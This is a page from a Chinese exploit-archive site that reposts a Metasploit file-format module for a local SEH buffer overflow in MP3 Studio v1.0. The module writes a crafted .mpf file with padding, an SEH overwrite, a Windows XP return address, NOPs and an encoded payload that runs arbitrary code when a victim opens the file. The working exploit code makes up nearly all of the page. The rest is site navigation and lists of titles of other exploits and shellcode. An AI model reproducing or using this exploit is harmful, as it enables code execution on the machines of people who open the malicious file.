首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH) Meta
来源:vfocus.net 作者:effects 发布时间:2010-06-04  
#####################################################################  
# Title: MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH) Meta
# CVE-ID: () 
# OSVDB-ID: () 
# Author: sid3^effects
# Published: 2010-06-03
#####################################################################


## This file is part of the Metasploit Framework and may be subject to  

## redistribution and commercial restrictions. Please see the Metasploit  

## Framework web site for more information on licensing and terms of use.  

## http://metasploit.com/framework/  

###  

   

require 'msf/core' 

   

class Metasploit3 < Msf::Exploit::Remote  

    Rank = GreatRanking  

   

    include Msf::Exploit::FILEFORMAT 

   

    def initialize(info = {})  

        super(update_info(info,  

            'Name'           => 'MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH) META',  

            'Description'    => %q{  

                  

                    

                    to execute arbitrary code.  

            },  

            'License'        => MSF_LICENSE,  

            'Author'         => [ 'sid3^effects aKa HaRi' ],  

            'Version'        => 'Version 1.0',  

            'References'     =>  

                [  

                    [ 'URL', 'http://www.exploit-db.com/exploits/9291' ],  

                ],  

            'DefaultOptions' =>  

                {  

                    'EXITFUNC' => 'seh',  

                },  

            'Payload'        =>  

                {  

                    'Space'    => 986,  

                    'BadChars' => "\x00\x1a\x0a\x0d",  

                    'StackAdjustment' => -3500,  

                },  

            'Platform' => 'win',  

            'Targets'        =>  

                [  

                    [ 'Windows XP Universal', { 'Ret' => 0x7c96bf33 } ], #  

JMP ESP in ULMigration_us.dll  

                ],  

            'Privileged'     => false,  

             
            'DefaultTarget'  => 0))  

   

            register_options(  

                [  

                    OptString.new('FILENAME',   [ false, 'The file name.',  

'msf.mpf']),  

                ], self.class)  

   

    end 

   

    def exploit  

   

        sploit =  "\x3f\x5e\x03\x10" 

        sploit << "\xeb\xf1\x90\x90" 

        sploit << "\xfd\x61\x03\x10" 

        sploit << rand_text_alpha_upper(4103)  

        sploit << [target.ret].pack('V')  

        sploit << make_nops(10)  

        sploit << payload.encoded  

        sploit << "\x33\xc0\x33\x45\xf8\x04\x05\xff\xe0" 

   


        mpf = sploit  

   

        print_status("Creating '#{datastore['FILENAME']}' file ...")  

   

        file_create(mpf)  

   

    end 

   

end 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe InDesign CS3 INDD file h
·S.O.M.P.L 1.0 Player Buffer Ov
·QtWeb 3.3 Remote DoS / Crash E
·FeedDemon <= 3.1.0.12 Stack Bu
·linux/x86 whoami shellcode 39
·Novell ZENworks Configuration
·Solaris/x86 - SystemV killall
·linux/x86 force unmount "/medi
·x86 linux hard / unclean reboo
·Pixelpost Add Admin Exploit (h
·x86 linux hard / unclean reboo
·linux/x86 displaying system te
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved